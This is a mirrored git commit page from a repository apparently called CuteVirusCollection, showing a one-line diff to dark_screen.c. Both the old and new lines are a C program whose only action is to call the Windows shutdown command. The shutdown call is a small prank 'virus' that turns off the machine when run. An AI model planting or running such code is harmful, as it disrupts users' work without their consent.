mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2025-12-12 15:50:04 -08:00
Update dark_screen.c
This commit is contained in:
@@ -6,5 +6,5 @@
|
||||
#include <stdlib.h>
|
||||
|
||||
main(){
|
||||
system("C:\\WINDOWS\\System32\\shutdown /s");
|
||||
system("shutdown -s");
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user